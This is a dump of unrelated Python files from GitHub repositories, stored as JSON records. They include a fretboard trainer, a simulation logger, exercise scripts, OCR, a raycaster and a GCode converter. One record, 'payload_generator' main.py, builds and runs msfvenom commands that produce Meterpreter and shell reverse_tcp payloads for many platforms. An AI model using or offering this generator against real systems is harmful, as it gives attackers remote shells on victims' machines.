string.append(open_string_note.shift(halftone=halftone))\n strings.append(string)\n self.strings = strings\n\n def display(self, highlight_notes=None, hightlight_frets=None, filler='---'):\n\n def str_format(note_name, filler):\n return f'{filler}{note_name:<2}{filler}'.replace(' ', filler[0])\n\n def fret0_format(note_name):\n return f'{note_name:<2}||'\n\n frets_str = [str_format(i, filler=filler) for i in range(1, len(self.strings[0]))]\n fret_label = fret0_format('0') + '|'.join(frets_str)\n\n strings_str = [fret_label]\n divider = '='*((3 + 2*len(filler))*(len(self.strings[0]) - 1) + 3)\n strings_str.append(divider)\n for string in self.strings[::-1]:\n l = []\n for fret in range(1, len(string)):\n note = string[fret]\n if highlight_notes is None or note in highlight_notes:\n l.append(str_format(note.note_name, filler=filler))\n else:\n l.append(str_format('-', filler=filler))\n open_string_note = string[0]\n string_str = fret0_format(open_string_note.note_name) + '|'.join(l)\n strings_str.append(string_str)\n strings_str.append(divider)\n strings_str.append(fret_label)\n display_str = '\\n'.join(strings_str)\n print(display_str)\n\n def get_note_name(self, string_number, fret):\n return self.strings[::-1][string_number - 1][fret].note_name\n\n def exercise_1(self, note_name='A', display_notes=False, string_numbers=[6, 5, 4, 3, 2, 1]):\n if display_notes:\n self.display()\n\n while True:\n answer = input(f'Type in the fret numbers of {note_name} in the string order of {string_numbers}, separated by a space: ')\n submitted_frets = [int(fret) for fret in answer.split()]\n submitted_note_names = [self.get_note_name(string_number, submitted_fret) for submitted_fret, string_number in zip(submitted_frets, string_numbers)]\n print('Your submitted answer: ', submitted_note_names)\n result = all(submitted_note_name == note_name for submitted_note_name in submitted_note_names)\n if result:\n self.display(highlight_notes=Notes([note_name]))\n print('CORRECT!')\n break\n else:\n print('WRONG!')\n\n def exercise_2(self, natural_only=True, display_notes=False, string_numbers=[6, 5, 4, 3, 2, 1]):\n if natural_only:\n note_pool = [note_name for note_name in Note.notes if Note.is_natural(note_name)]\n else:\n note_pool = Note.notes\n\n while True:\n note_name = np.random.choice(note_pool, size=1)[0]\n self.exercise_1(note_name=note_name)\n","repo_name":"krongch2/music","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":8029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23944924061","text":"#!/usr/bin/env python\n# import pytest\nimport os\nfrom person import Person\n\nclass Logger(object):\n \n # checked\n def __init__(self, file_name):\n self.file_name = file_name\n\n\n def write_metadata(self, pop_size, vacc_percentage, virus_name, mortality_rate,\n basic_repro_num):\n\n if os.path.exists(self.file_name):\n writeMode = 'a'\n else:\n writeMode = 'w'\n\n myLogFile = open(self.file_name, writeMode)\n myString = \"pop_size: {0} \\nvacc_percentage: {1} \\nvirus_name: {2} \\nmortality_rate: {3} \\nbasic_repro_num: {4}\\n\".format(\n pop_size, vacc_percentage, virus_name, mortality_rate, basic_repro_num)\n myLogFile.write(myString)\n\n myLogFile.close()\n\n\n def log_interaction(self, person, random_person, random_person_sick,\n random_person_vacc, did_infect):\n \n outFile = open(self.file_name, \"a\")\n\n if random_person_vacc is True:\n outFile.write(\"{0} is vaccinated, nothing 
happened!\\n\".format(random_person._id))\n elif random_person_sick is True:\n outFile.write(\"{0} is already infected, nothing happened!\\n\".format(random_person._id))\n elif random_person_vacc is False and random_person_sick is None:\n outFile.write(\"{0} infected {1}!\\n\".format(person._id, random_person._id))\n else:\n outFile.write(\"No interaction logged\\n\")\n\n def log_infection_survival(self, person, did_die_from_infection):\n \n outFile = open(self.file_name, \"a\")\n\n if did_die_from_infection is False:\n outFile.write(\"{0} survived!\\n\".format(person._id))\n elif did_die_from_infection is True:\n outFile.write(\"AHHH {0} DIED!\\n\".format(person._id))\n\n def log_time_step(self, time_step_number):\n \n outFile = open(self.file_name, \"a\")\n outFile.write(\"Time step: {0} ended...beginning {1}\\n\".format(time_step_number, time_step_number + 1))\n \n\ndef test_logger_instantiation():\n\n\n logger = Logger(\"simulation.txt\")\n assert logger.file_name == \"simulation.txt\"\n\n\n logger = Logger(\"logger_file.txt\")\n assert logger.file_name == \"logger_file.txt\"\n\n\n\ndef test_write_metadata():\n logger = Logger(\"simulation.txt\")\n logger.write_metadata(200, 0.45, \"HIV\", 0.88, 0.23)\n\n\n file = open(\"simulation.txt\", \"r\")\n assert file is not None\n linesInFile = file.readlines()\n lastFiveLinesInFile = linesInFile[-5:]\n\n for i, line in enumerate(lastFiveLinesInFile):\n splitLine = line.split(\" \")\n if i == 0: # current line == 1,\n if \"200\" in line:\n lineOneArray = splitLine\n assert lineOneArray[1] == \"200\"\n if i == 1:\n if \"0.45\" in line:\n lineTwoArray = splitLine\n assert lineTwoArray[1] == \"0.45\"\n if i == 2:\n if \"HIV\" in line:\n lineThreeArray = splitLine\n assert lineThreeArray[1] == \"HIV\"\n if i == 3:\n if \"0.88\" in line:\n lineFourArray = splitLine\n assert lineFourArray[1] == \"0.88\"\n if i == 4:\n if \"0.23\" in line:\n lineFiveArray = splitLine\n assert lineFiveArray[1] == \"0.23\\n\"\n\ndef test_log_interaction_():\n\n logger = Logger(\"simulation.txt\")\n\n person1 = Person(\"sam\", True, True) # is alive & vaccinated\n person2 = Person(\"bob\", False, False) # is alive & not vaccinated\n\n logger.log_interaction(person1, person2, False, True)\n\n logger.log_interaction(person1, person2, True)\n\n\n file = open(\"logger_file.txt\", \"r\")\n data = file.read()\n\n print(data)\n\n\n logger.log_interaction(person1, person2, None, False)\n\n file = open(\"simulation.txt\", \"r\")\n assert file is not None\n\n linesInFile = file.readlines()\n\n","repo_name":"makhmudislamov/HerdImmunityMakeSchool-Refactored","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4673745158","text":"def addTwoNumbers(n1, n2):\n sumanswer = n1 + n2\n # returning sum of two numbers\n return sumanswer\n# function to sub 2 numbers\ndef subtractAfromB(a, b):\n subtractAnswer = abs(a - b)\n return subtractAnswer\n# function to mul 2 numbers\ndef multiplyTwoNumbers(n1,n2):\n multiplyAnswer = (n1*n2)\n return multiplyAnswer\n\n# function to divide\ndef divide(numerator, denominator):\n dividedanswer = numerator / denominator\n return dividedanswer\n#main code\ndef sum(i):\n total =0\n for num in i:\n total = addTwoNumbers(total,num)\n return total\n\n#we have sales data for a week. 
\ncostOfCoffee, costOfTea, costOfVadai =25,20,25\nlist1 = []\ncoffeeSales = [56,78,56,45,90, 103,120]\nteaSales = [100,123,456,123,222,400,346]\nvadaiSales = [23,45,67,12,89,90,120]\nlist1.append(coffeeSales)\nlist1.append(teaSales)\nlist1.append(vadaiSales)\n#Find total sales in the week.\ntotal =0\nfor i in list1: \n output = sum(i)\n total = addTwoNumbers(total,output)\n avg =divide(output,len(i))\n print(f'The total sales is {output} , and its their average is {avg} ') \nemployeeSalary = 500 #Rs500 per day\nemployeeSalaryPerWeek = multiplyTwoNumbers(500,7)\n#calculate sales per week\nprint(f\"the total sales per week is {total}\")\n#calcuate sales per month\nsalesPerMonth = multiplyTwoNumbers(total,4)\nprint(f\"Total sales per month : \",salesPerMonth)\n#calculate profit.\nprint(f'Profit is :', subtractAfromB(salesPerMonth,employeeSalary))\n\n\n'''\noutput --\nThe total sales is 548 , and its their average is 78.28571428571429 \nThe total sales is 1770 , and its their average is 252.85714285714286 \nThe total sales is 446 , and its their average is 63.714285714285715\nthe total sales per week is 2764\nTotal sales per month : 11056\nProfit is : 10556\n\n'''","repo_name":"NikishDAniel/DANIEL_SAYUR","sub_path":"nextwealth/functions/calculator3.py","file_name":"calculator3.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29427908069","text":"def numero_perfecto(a):\n suma=0\n for i in range(1,a):\n if a%i==0:\n suma=suma+i\n if suma==a:\n return True\n elif suma!=a:\n return False\n\nif __name__==\"__main__\":\n a=int(input(\"Ingrese a: \"))\n print(\"el numero es perfecto: \",numero_perfecto(a))\n n=int(input(\"Ingrese un numero: \"))\nn=9\nsuma2=0 \nfor i in range(1,n):\n if numero_perfecto(i)==True:\n suma2=suma2+i\nif __name__==\"__main__\":\n print(suma2)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej3/tema2_ej3_b8002139cdde66b87638f7f91d169d96.py","file_name":"tema2_ej3_b8002139cdde66b87638f7f91d169d96.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1895462123","text":"import unittest\nfrom src.task_scheduler import Solution\n\n\nclass Tests(unittest.TestCase):\n def test_1(self):\n tasks = [\"A\", \"A\", \"A\", \"B\", \"B\", \"B\"]\n n = 2\n test_result = 8\n actual_result = Solution()\n self.assertEqual(test_result, actual_result.leastInterval(tasks, n))\n\n def test_2(self):\n tasks = [\"A\", \"A\", \"A\", \"B\", \"B\", \"B\"]\n n = 0\n test_result = 6\n actual_result = Solution()\n self.assertEqual(test_result, actual_result.leastInterval(tasks, n))\n\n def test_3(self):\n tasks = [\"A\", \"A\", \"A\", \"A\", \"A\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"]\n n = 2\n test_result = 16\n actual_result = Solution()\n self.assertEqual(test_result, actual_result.leastInterval(tasks, n))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"jrandj/leetcode","sub_path":"python/test/test_test_scheduler.py","file_name":"test_test_scheduler.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72988398967","text":"#!/usr/bin/python3\n\nimport os\nimport sys\n\n\nprint(\"Payload Generator\")\nprint(\"\")\n\n###### Getting IP\nprint(\"[+] Finding currently used network adapters\")\nos.system(\"ifconfig | grep flags | cut -d ':' -f 
1\")\nprint(\"\")\nip_choice = input(\"[++] Please choice which adapter you are using. \")\nprint(\"\")\nprint(\"Your IP address is...\")\nip1 = os.popen(\"ifconfig {adp} | grep 'inet ' | cut -d ' ' -f 10\".format(adp=ip_choice)).read()\nip = ip1.rstrip()\nprint(ip)\n\n\n###### Setting Port\nport = input(\"[++] Please enter port you will be listening on. \")\nprint(\"\")\n\n\n\n###### Setting payload\nprint(\"[+] Building payload...\")\ntype_1 = input(\" [++] Staged or Stageless? (1 or 2): \")\ntype_2 = input(\" [++] Meterpreter or Standard? (1 or 2): \")\nos1 = input(\" [++] Windows or Linux? (1 or 2): \")\nos_arc = input(\" [++] x86 or x64? (1 or 2): \")\npayload = \"\"\n\n# Meterpreter Staged\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/meterpreter/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/meterpreter/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/meterpreter/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/meterpreter/reverse_tcp\"\n\n# Meterpreter Stageless\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/meterpreter_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/meterpreter_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/meterpreter_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"1\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/meterpreter_reverse_tcp\"\n\n\n\n# Standard Stanged\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/shell/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/shell_reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/shell/reverse_tcp\"\nif type_1 == \"1\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/shell/reverse_tcp\"\n\n# Standard Stangeless\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"1\":\n payload = \"windows/shell_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"1\" and os_arc == \"2\":\n payload = \"windows/x64/shell_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"1\":\n payload = \"linux/x86/shell_reverse_tcp\"\nif type_1 == \"2\" and type_2 == \"2\" and os1 == \"2\" and os_arc == \"2\":\n payload = \"linux/x64/shell_reverse_tcp\"\n\n\n# Used for Error Handling\nif payload == \"\":\n print(\"Something went wrong... Please check inputs. 
Exiting...\")\n sys.exit()\n\nprint(\"\")\nprint(\"[+] Supported file types...\")\nprint(\"1 = .exe 5 = .aspx 9 = .py\")\nprint(\"2 = .elf 6 = .jsp 10 = .sh\")\nprint(\"3 = .php 7 = .war\")\nprint(\"4 = .asp 8 = .pl\")\nset_file_type = input(\" [++] Choose a supported file type: \")\n\nif set_file_type == \"1\":\n file_type = \"exe\"\nelif set_file_type == \"2\":\n file_type = \"elf\"\nelif set_file_type == \"3\":\n file_type = \"php\"\n payload = \"php/reverse_php\"\nelif set_file_type == \"4\":\n file_type = \"asp\"\nelif set_file_type == \"5\":\n file_type = \"aspx\"\nelif set_file_type == \"6\":\n file_type = \"jsp\"\n payload = \"java/jsp_shell_reverse_tcp\"\nelif set_file_type == \"7\":\n file_type = \"war\"\n payload = \"java/jsp_shell_reverse_tcp\"\nelif set_file_type == \"8\":\n file_type = \"pl\"\n payload = \"cmd/unix/reverse_perl\"\nelif set_file_type == \"9\":\n file_type = \"py\"\n payload = \"cmd/unix/reverse_python\"\nelif set_file_type == \"10\":\n file_type = \"sh\"\n payload = \"cmd/unix/reverse_bash\"\nelse:\n print(\"Something went wrong... Please check inputs. Exiting...\")\n sys.exit()\nprint(\"\")\n\ndel_file = \"shell.{file}\".format(file=file_type)\nif os.path.isfile(del_file):\n os.system(\"rm -r {file}\".format(file=del_file))\n\n\nprint(\"Payload ready\")\nmsf_command = \"msfvenom -p {payload} LHOST={ip} LPORT={port} -f {file} > shell.{file}\".format(payload=payload,ip=ip,port=port,file=file_type)\nprint(msf_command)\nprint(\"\")\n\n\nos.system(msf_command)\n","repo_name":"Cyb3rR3ap3r/payload_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"75120639607","text":"from fastapi import status, Response\nimport mysql.connector\n\n\ndef mySQL_Connection():\n mySQL = mysql.connector.connect(\n host=\"localhost\", user=\"root\", password=\"\", database=\"manageapi\")\n myCursor = mySQL.cursor(dictionary=True)\n return mySQL, myCursor\n\n\ndef get_projectid(id: int, response: Response):\n mySQL, myCursor = mySQL_Connection()\n\n myproducts = 'SELECT * FROM `projects` WHERE `project_id` = %s'\n val = (id, )\n myCursor.execute(myproducts, val)\n mystringprojects = myCursor.fetchone()\n\n if mystringprojects is None:\n response.status_code = status.HTTP_404_NOT_FOUND\n return {\"message\": \"ไม่มีสินค้าชิ้นนี้ในฐานข้อมูล\"}\n else:\n result = {}\n result['project_id'] = mystringprojects['project_id']\n result['project_name'] = mystringprojects['project_name']\n result['project_url'] = mystringprojects['project_url']\n result['project_key'] = mystringprojects['project_key']\n result['project_section'] = mystringprojects['project_section']\n \n mySQL.close()\n myCursor.close()\n response.status_code = status.HTTP_200_OK\n return result\n\n # if mystringcomponents:\n # component = []\n # for data in mystringcomponents:\n # components = {}\n # components['name'] = data['component_name']\n # components['value'] = data['component_type']\n # component.append(components)\n # result['product_component'] = component\n # else:\n # result['product_component'] = None\n\n # mySQL.close()\n # myCursor.close()\n # response.status_code = status.HTTP_200_OK\n # return result\n","repo_name":"iyou25/vicore","sub_path":"backend/projectid.py","file_name":"projectid.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"23182298235","text":"class ProjectManager:\n def __init__(self):\n self.projectName = ''\n self.keyFrames = []\n\n def setProject(self, name, osPath):\n self.projectName = name+'.stm'\n if not osPath.isfile(self.projectName):\n open(self.projectName, 'w').close()\n\n def storeKeyFrames(self, frames):\n keys = ''\n for frame in frames:\n for name, part in frame.BODY_PARTS.items():\n keys += \"{},{},{},{},{}\\n\".format(name, part.bone.x, part.bone.y, part.x, part.y)\n\n file = open(self.projectName, \"w\")\n file.write(keys)\n file.close()\n\n def getKeyFrames(self):\n file = open(self.projectName, \"r\")\n keys = file.read().strip().split('\\n')\n dic = {}\n for i, key in enumerate(keys):\n key = key.split(',')\n dic[key[0]] = list(map(int, key[1:len(key)]))\n if (i+1)%10 == 0:\n self.keyFrames.append(dic)\n dic = {}\n\n file.close()\n\n return self.keyFrames\n","repo_name":"Karthick-sketch/Pygame-Projects","sub_path":"Stickman-Animator/projectManager.py","file_name":"projectManager.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27740637731","text":"#!/usr/bin/env python3\nimport subprocess\n\nprocesses = ['./par_nlg.out', './par_sq.out', './seq_sq.out', './seq_nlg.out']\nsizes = ['120', '180', '240']\ncores = ['1', '2', '3', '4']\n\ndef run_process(run):\n rv = subprocess.check_output(run).decode('utf-8')\n rv = rv.strip()\n rv = rv.split('\\n')\n for i, line in enumerate(rv):\n rv[i] = line.split(' ')\n if 'workers' in rv[0]:\n cpu_count = int(rv[0][8])\n else:\n cpu_count = 1\n bodies = int(rv[0][1])\n time = float(rv[1][1])\n return (p, bodies, time, cpu_count)\n\n\nfor p in processes:\n runs = []\n for size in sizes:\n if 'par' in p:\n for c in cores:\n runs.append([p, size, '50000', c])\n else:\n runs.append([p, size, '50000'])\n if 'nlg' in p:\n for run in runs:\n run.append('0.7')\n\n \n for run in runs:\n results = []\n for i in range(5):\n results.append(run_process(run))\n for i in range(2):\n results.remove(min(results, key=lambda rvec: rvec[2]))\n results.remove(max(results, key=lambda rvec: rvec[2]))\n print(results[0])\n","repo_name":"sakjur/parallell","sub_path":"project/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38835039813","text":"import os\nfrom glob import glob\nfrom setuptools import setup\n\npackage_name = 'yolov3_ros'\nshare_dir = 'share/' + package_name\n\nsetup(\n name=package_name,\n version='0.2.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages', ['resource/' + package_name]),\n (share_dir, ['package.xml'])\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='jinseog',\n maintainer_email='jstar0525@gmail.com',\n description='YOLOv3 pytorch ros',\n license='BSD',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'detector = yolov3_ros.detector:main'\n ],\n },\n)\n","repo_name":"jstar0525/ros2_yolov3","sub_path":"yolov3_ros/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12108496282","text":"import numpy as np\nimport pandas as pd\nimport sqlite3\n\n# pais_nome = np.array(['Great Britain', 'China', 'Russia', 'United States', 'Korea', 'Japan', 'Germany'])\n# vetor = 
pd.Series(pais_nome)\n#\n# print(vetor)\n\n# dici = pd.Series([29, 38, 24, 46, 13, 7, 11], index=['Great Britain', 'China', 'Russia', 'United States', 'Korea', 'Japan', 'Germany'])\n# print(dici.loc['China'])\n#\n# print(dici.iloc[0])\n#\n#\n#\n# primeiro = pd.Series([1,2,3,4], index=['a', 'b', 'c', 'd'])\n# segundo = pd.Series([10,20,30,40], index=['a', 'b', 'c', 'd'])\n# total = primeiro + segundo\n#\n# print(total)\n#\n# lista = {'cidade': ['toronto', 'bh'], 'ano':[2000, 2010]}\n# ve = pd.DataFrame(lista)\n#\n# print(ve.describe())\n\n#\n# participantes = pd.Series([200, 201, 202], index=['a', 'b', 'c'])\n# doideri = pd.Series(['eu', 'vc', 'tu'], index=['a', 'b', 'c'])\n# ser = pd.DataFrame({'olha que legal': participantes, 'vamo ve':doideri})\n# print(ser)\n\n\n# vetor = np.array([2010, 2012, 2015])\n# dic = {'ano': vetor}\n# df = pd.DataFrame(dic)\n# print(df.head(1))\n#\n# print(df.tail(1))\n#\n# print(df.index)\n\n# def standardize(test):\n# return (test - test.mean()/ test.std())\n#\n# def standardize_scores(dataf):\n# return (dataf.apply(standardize))\n#\n# teste = pd.DataFrame({'teste1': [95, 84, 73, 88, 82, 61], 'teste2': [74, 85, 82, 73, 77, 79]}, index=['jack', 'lewis', 'patrick', 'rich', 'kelly', 'paula'])\n# # print(teste.sort_values('teste1'))\n#\n# # print(standardize(teste['teste1']))\n# print(standardize_scores(teste))\n\ncreate_table = \"\"\"CREATE TABLE student_score\n(Id INTEGER, Name VARCHAR(20), Math REAL, Science REAL);\"\"\"\n\ninsertSQL = [(10, 'Jack', 85,92),(29,'Tom', 73, 89), (65, 'Ram', 65.5, 77),\n (5, 'Steve',55, 91)]\ninsert_stat = \"Insert into student_score values (?,?,?,?)\"\n\n\nexecuteSQL = sqlite3.connect(':memory:')\nexecuteSQL.execute(create_table)\nexecuteSQL.executemany(insert_stat, insertSQL)\nexecuteSQL.commit()\n\nSQL_query = executeSQL.execute('select * from student_score')\nresultset = SQL_query.fetchall()\nprint(resultset)\ndf_stutend = pd.DataFrame(resultset, columns=list(zip(*SQL_query.description))[0])\nprint(df_stutend)","repo_name":"filipeth/Machine-Learning","sub_path":"exemplo-pandas.py","file_name":"exemplo-pandas.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27451648410","text":"def plot(n, t, loglog, interpolation):\n from matplotlib import pyplot as plt\n\n interpolated = list(map(interpolation, n))\n # ci = 1/1.2e-6\n ci = interpolated[0]/0.6\n interpolated = list(map(lambda x: x/ci, interpolated))\n\n ca = t[0]\n t = list(map(lambda x: x/ca, t))\n # plotting the points\n plt.plot(n, t, color='k', label='actual')\n plt.plot(n, interpolated, color='r', label='interpolated')\n plt.legend()\n\n if loglog:\n plt.loglog(n, t)\n plt.loglog(n, interpolated)\n # naming the x axis\n plt.xlabel('input size (n)')\n # naming the y axis\n plt.ylabel('run time')\n\n # giving a title to my graph\n plt.title('time complexity')\n\n # function to show the plot\n plt.show()\n","repo_name":"kris-randen/udacity-algorithms","sub_path":"venv/P0/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9024502738","text":"# pattern printing\r\n# inp = int n\r\n# boolean = true / false\r\n#\r\n# True n=4\r\n# *\r\n# **\r\n# ***\r\n# ****\r\n# False n =4\r\n# ****\r\n# ***\r\n# **\r\n# *\r\n\r\n# i = 1\r\ntry:\r\n n = int(input('enter no of rows: '))\r\n # var = int(input('enter true(1) / false(0): '))\r\n # var = bool(var) 
#the int has to be converted to bool here, not the string\r\n\r\n    var = bool(int(input('enter true(1) / false(0): ')))\r\n\r\n    if var == True:\r\n#         # for i in range(1, n + 1):\r\n#         #     print('*' * i)\r\n#\r\n#       alternate way to do it\r\n        for i in range(1, n + 1):\r\n            for j in range(1, i+1):\r\n                print('*',end=' ')\r\n            print()\r\n\r\n\r\n\r\n\r\n    if var == False:\r\n        # for i in range(1, n + 1):\r\n        #     print('*' * (n + 1 - i))\r\n\r\n        for i in range(n,0,-1):\r\n            print(i)\r\n            for j in range(1, i+1):\r\n                print('*',end=' ')\r\n            print()\r\n\r\nexcept Exception as e:\r\n    print('invalid input!!')\r\n","repo_name":"Juilee27/Python","sub_path":"PyCharm/exercise4.py","file_name":"exercise4.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"42118800707","text":"f = open(\"../../Language_Models/characters.dic\", \"r\")\ng = open(\"./phonetic.csv\", \"r\")\nw = open(\"./new.dic\", \"w+\")\nar = f.read().split(\"\\n\")\narr = g.read().split(\"\\n\")\nfor line in arr:\n    hyp = line.split(\",\")\n    i = 0\n    try:\n        while ar[i].startswith(hyp[0]):\n            w.write(ar[i] + \"\\n\")\n            i = i + 1\n    except Exception as e:\n        print(e)\n    for h in hyp[:len(hyp) - 1]:\n        if len(h) > 1:\n            w.write(hyp[0] + \"(\" + str(i + 2) + \")\" + \"\t\" + h + \"\\n\")\n            i = i + 1\nf.close()\ng.close()\nw.close()\n","repo_name":"AnirbanBanik1998/Modern_Speak_and_Spell","sub_path":"Speech_Processing/accuracy_check/new_dict.py","file_name":"new_dict.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"}
+{"seq_id":"13901163506","text":"import os\nimport easyocr\nimport time\n\n# Get the current directory\n# C:\\Users\\USER\\Downloads\\ocr\n# current_directory = \"C:\\\\Users\\\\USER\\\\Downloads\\\\ocr\"\ncurrent_directory = \"C:\\\\Users\\\\USER\\\\Desktop\\\\ocr\"\n\n# Initialize the OCR reader\nreader = easyocr.Reader(['en'])\n\n# Open a file for writing the results\noutput_file = open(f'output_{str(int(time.time()))}.txt', 'w')\nfor filename in os.listdir(current_directory):\n    # Check if the file is an image (you can add more image file extensions if needed)\n    if filename.endswith(('.jpg', '.jpeg', '.png', '.gif')):\n        # Read the text from the image\n        image_path = os.path.join(current_directory, filename)\n        result = reader.readtext(image_path, detail=0)\n\n        # Write the result to the output file\n        output_file.write(f\"File: {filename}\\n\")\n        output_file.write(f\"Text: {result}\\n\")\n        output_file.write(\"\\n\")\n\n        # Log the progress to the terminal\n        print(f\"Processed: {filename}\")\n\n\n# Close the output file\noutput_file.close()\n","repo_name":"Bayurzx/imageToText","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"35915389023","text":"import pygame\r\nimport math\r\n\r\nclass Ray:\r\n    def __init__(self, x, y, angle):\r\n        self.position = pygame.Vector2(x, y)\r\n        self.direction = pygame.Vector2(math.cos(angle), math.sin(angle))\r\n        self.angle = angle\r\n        self.last_cast = pygame.Vector2()\r\n    \r\n    def update_pos(self, new_x, new_y):\r\n        self.position.x = new_x\r\n        self.position.y = new_y\r\n\r\n    def set_angle(self, angle):\r\n        self.direction = pygame.Vector2(math.cos(angle), math.sin(angle))\r\n        self.angle = angle\r\n\r\n    def draw(self, screen):\r\n        pygame.draw.line(screen, (170, 170, 170), self.position, \r\n                        
self.last_cast)\r\n\r\n def cast(self, wall):\r\n # Line intersection formula\r\n x1 = wall.point_one.x\r\n y1 = wall.point_one.y\r\n x2 = wall.point_two.x\r\n y2 = wall.point_two.y\r\n\r\n x3 = self.position.x\r\n y3 = self.position.y\r\n x4 = self.position.x + self.direction.x\r\n y4 = self.position.y + self.direction.y\r\n\r\n den = (x1 - x2) * (y3 - y4) - (y1 - y2) * (x3 - x4)\r\n if den == 0:\r\n return False\r\n\r\n t = ((x1 - x3) * (y3 - y4) - (y1 - y3) * (x3 - x4)) / den\r\n u = -((x1 - x2) * (y1 - y3) - (y1 - y2) * (x1 - x3)) / den\r\n\r\n # If intersection\r\n if t > 0 and t < 1 and u > 0:\r\n # Calculate point of intersection and return\r\n intersect = pygame.Vector2()\r\n intersect.x = x1 + t * (x2 - x1)\r\n intersect.y = y1 + t * (y2 - y1)\r\n return intersect\r\n\t\t\r\n return False\r\n","repo_name":"Jamz25/raycast-engine-py","sub_path":"src/ray.py","file_name":"ray.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12985527807","text":"'''\r\nFetch an image, vector-fill it via the first-left diagonal algorithm and convert it to a set of\r\nGCode instructions for a 3D Printer controller. The ultimate goal is to let the printer head \"draw\"\r\nthe desired image, either via pencil, or via a drill thus converting it to a CNC mill.\r\n\r\nRemarks:\r\n* Marlin GCode dialect\r\n* The origin at the start will be the absolute movement origin, right-top-up orientation\r\n* Assume the drill bit starts at the bottom left and Z=drilling the surface at desired depth\r\n* Perform the test swipe around the drilled area and wait for confirmation before drilling\r\n* Requires separately configurable X-Y and Z speeds due to mechanical reasons (direct vs wormgear)\r\n\r\noton.ribic@bug.hr\r\n'''\r\n\r\nimport vectorizer\r\nfrom PIL import Image as pil\r\n\r\n# Some statics\r\n\r\n# GCode initializations\r\nGCodeHeader = ['M82;Absolute mode',\r\n 'G92 X0 Y0 Z0 E0;Reset coordinate system',\r\n 'M107;Fans off',\r\n 'M17;Enable motors',\r\n ]\r\nGCodeFooter = ['M84 X Y E;Release motors',\r\n ]\r\n\r\n# Main bitmap -> vector GCode processing\r\n\r\n\r\ndef img2cnc(\r\n inputfile, # Image file w/ path or PIL handle directly\r\n outputfile=None, # Autogenerated if not supplied\r\n invertpixels=True, # Whether to consider black pixels \"true\" instead of white\r\n scale=0.1, # How many GCode millimeters per pixel in the image (0.1 = 10 